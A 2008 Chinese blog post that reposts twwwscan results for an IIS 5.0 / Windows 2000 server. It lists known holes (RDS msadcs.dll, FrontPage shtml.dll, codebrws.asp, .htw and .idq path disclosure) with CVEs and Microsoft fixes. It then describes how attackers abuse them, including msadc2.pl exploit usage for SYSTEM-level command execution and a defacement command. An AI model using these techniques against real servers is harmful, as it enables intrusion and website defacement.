Chinaunix首页 | 论坛 | 博客
  • 博客访问: 18661942
  • 博文数量: 7460
  • 博客积分: 10434
  • 博客等级: 上将
  • 技术积分: 78178
  • 用 户 组: 普通用户
  • 注册时间: 2008-03-02 22:54
文章分类

全部博文(7460)

文章存档

2011年(1)

2009年(669)

2008年(6790)

分类: 网络与安全

2008-05-31 20:51:57

(附带黑狐网络的攻击方法)
  劲刀狂舞最近用twwwscan扫描了自己的win 2k server,web server(iis5.0),sp1,结果很是令人担心。
  从前笔扫描网络主机时,经常发现有这样的漏洞组合,原来是网络管理员的懒惰,使得主机漏洞百出,我只能把这些漏洞拿出来,伤他们的自尊了。
  host: 127.0.0.1
  port: 80
  Server: Microsoft-IIS/5.0
  if the webserver is apache,remove unnecessary information
  
  IIS (codebrws.asp) Hole B
  /iissamples/sdk/asp/docs/codebrws.asp
  solution:delete this file or ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
  
  RDS Securty Hole(msadcs.dll)
  /msadc/msadcs.dll
  important patch
  CVE-1999-1011
  solution:MS99-025.asp
  
  IIS Path Reveal(anything.idq)
  /test.idq
  IIS Path Reveal
  
  IIS Path Reveal(anything.ida)
  /test.ida
  IIS Path Reveal
  
  Malform Hit-Highlighting(qfullhit.htw)
  
  CVE-2000-0097
  MS00-006.asp
  
  Index Server Security Hole(null.htw)
  
  CVE-2000-0097
  MS00-006.asp
  
  FrontPage 2k <=1.1 Path vul
  /_vti_bin/shtml.dll/nosuch.htm
  CAN-2000-0413
  solution:vendor homepage
  
  FrontPage 2k,IIS Multiple (shtml.dll)
  /_vti_bin/shtml.dll
  good reading Cross-site Scripting Overview
  solution:vendor homepage
  
  Frontpage97 fpcount bof(fpcount.exe)
  /_vti_bin/fpcount.exe
  solution:delete fpcount.exe
  
  FrontPage MS-DOS Device DoS(shtml.exe)
  /_vti_bin/shtml.exe
  vendor homepage
  
  IIS 4/5 remote execute check method A
  
  important patch
  solution:MS00-057
  
  Indexing service for win2k .htw
  
  solution:MS00-084
  
  其中:
  _vti_bin/shtml.dll
  
  入侵者利用这个文件将能使您的系统的CPU占用率达到100%
  如果用户点击上述指定的链接,脚本将通过HTTP请求从客户端传送给可信任的站点,可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时,将执行该脚本,并将赋予来自可信任站点的内容的所有权力赋予该脚本。
  使用如下格式的URL:
  
  
  shtml.exe
  
  如果您使用Front Page作为您的WebServer,那么入侵者能够利用IUSR_用户和shtml.exe入侵您的机器,做您不希望的事
  提交这样的链接,都可能使FrontPage Server Extensions停止响应:
  
  
  
  
  
  codebrws.asp
  
  描述: 在/iissamples/sdk/asp/docs/下面存在codebrws.asp文件,用下面的路径:
  
  就可以查看到index.asp的源码。实际上任何ascii文件都可以浏览。
  
  Microsoft IIS Unicode解码目录遍历漏洞
  
  这个不用说了,小孩子都知道了。
  
  msadc
  
  IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行
  你系统的命令。主要核心问题是存在于RDS Datafactory,默认情况下,
  它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,
  其一般默认情况下是SYSTEM用户。
  
  利用程序为\cgi\iis_cgi\msadc2.pl,我们看看它的help
  
  [quack@chat quack]$ perl msadc2.pl -h
  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
  
  Usage: msadc.pl -h { -d -X -v }
  -h = host you want to scan (ip or domain)
  -d = delay between calls, default 1 second
  -X = dump Index Server path table, if available
  -N = query VbBusObj for NetBIOS name
  -V = use VbBusObj instead of ActiveDataFactory
  -v = verbose
  -e = external dictionary file for step 5
  -u <\\host\share\file> = use UNC file
  -w = Windows 95 instead of Windows NT
  -c = v1 compatibility (three step query)
  -s = run only step
  
  Or a -R will resume a (v2) command session
  
  [quack@chat quack]$ perl msadc2.pl -h
  -- RDS smack v2 - rain forest puppy / ADM / wiretrip --
  Type the command line you want to run (cmd /c assumed):
  cmd /c
  
  如果出现cmd /c后,直接键入命令行,就可以以system权限执行命令了。比如xundi教的:
  echo hacked by me > d:\inetpub\wwwroot\victimweb\index.
阅读(1205) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~